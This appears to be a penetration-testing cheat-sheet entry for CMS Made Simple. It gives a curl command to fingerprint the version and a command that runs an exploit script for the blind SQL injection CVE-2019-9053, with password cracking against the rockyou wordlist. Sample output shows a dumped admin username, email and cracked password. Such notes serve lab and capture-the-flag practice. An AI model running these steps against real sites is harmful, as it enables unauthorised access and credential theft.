CMS Made Simple

What it is: Lightweight CMS for small websites. Known for a blind SQL injection vulnerability in versions below 2.2.10 that dumps admin credentials.

Default ports: 80, 443

Vuln research:


Identify version

Check /doc/CHANGELOG.txt — Version determines SQLi availability

curl -s http://$IP/doc/CHANGELOG.txt | head -10

SQLi (CVE-2019-9053)

Blind SQLi on CMS Made Simple < 2.2.10 — Dumps admin credentials

python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt
Example Output
[+] Salt for password found: xxxxxxxx
[+] Username found: admin
[+] Email found: admin@site.com
[+] Password found: SuperSecret